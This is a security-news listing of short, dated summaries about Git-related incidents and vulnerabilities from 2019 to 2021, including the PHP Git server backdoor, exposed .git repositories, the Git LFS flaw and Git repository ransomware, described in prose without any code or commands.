Security News

PHP's Git Server Hacked to Insert Secret Backdoor to Its Source code
2021-03-29 03:51

In yet another instance of a software supply chain attack, unidentified actors hacked the official Git server of the PHP programming language and pushed unauthorized updates to insert a secret backdoor into its source code. The changes, which were committed as "Fix Typo" in an attempt to slip through undetected as a typographical correction, involved provisions for execution of arbitrary PHP code.

Researchers hacked Indian govt sites via exposed git and env files
2021-03-12 16:46

Researchers have now disclosed more information on how they were able to breach multiple websites of the Indian government. Last month, researchers from the Sakura Samurai hacking group had partially disclosed that they had breached cyber systems of Indian government after finding a large number of critical vulnerabilities.

Passwords begone: GitHub will ban them next year for authenticating Git operations
2020-12-17 08:29

Microsoft's GitHub plans to stop accepting account passwords as a way to authenticate Git operations, starting August 13, 2021, following a test period without passwords two-weeks earlier. As of next August, that requirement will be extended to all Git-related command line interactions, desktop apps that use Git, and software or services that access Git repos on GitHub via password.

Git LFS vulnerability allows attackers to compromise targets’ Windows systems (CVE-2020-27955)
2020-11-05 11:14

A critical vulnerability in Git Large File Storage, an open source Git extension for versioning large files, allows attackers to achieve remote code execution if the Windows-using victim is tricked into cloning the attacker's malicious repository using a vulnerable Git version control tool, security researcher Dawid Golunski has discovered. Golunski found that Git LFS does not specify a full path to git binary when executing a new git process via a specific exec.

ProtonMail-run website boasting 'complete guide' to GDPR left credential-baring .git repo exposed online
2020-04-29 09:00

An EU-sponsored GDPR advice website run by Proton Technologies had a vulnerability that let anyone clone it and extract a MySQL database username and password. "The irony of a EU-funded website about GDPR having security issues isn't lost on us," mused the security consultancy.

GDPR Compliance Site Leaks Git Data, Passwords
2020-04-27 21:15

The website, GDPR.EU, is an advice site for organizations that are struggling to comply with the General Data Protection Regulation laws that were imposed by the EU in 2018. "However, the irony of a EU-funded web site about GDPR having security issues isn't lost on us."

How to install and use git-secret
2020-01-02 19:18

Learn how to gain more security in your git repository with the help of the git-secret tool. If you use Git for much of your development needs, you should know there's a dirty little secret to be found.

Git your patches here! GitHub offers to brew automatic pull requests loaded with vuln fixes
2019-05-30 07:12

Your repo's dependencies need updating to close a hole? We're way ahead of you, pal GitHub can now automagically offer security patches for projects' third-party dependencies.…

Hundreds of Git Repositories Held for Ransom
2019-05-06 08:20

Cybercriminals have been wiping GitHub, GitLab and Bitbucket repositories and asking their owners to pay a ransom to recover the data. The impacted Git service providers believe the attackers have...

Mystery Git ransomware appears to blank commits, demands Bitcoin to rescue code
2019-05-03 19:00

Sudden flurry of forum posts leaves a few clues Programmers say they've been hit by ransomware that seemingly wipes their Git repositories' commits and replaces them with a ransom note demanding Bitcoin.…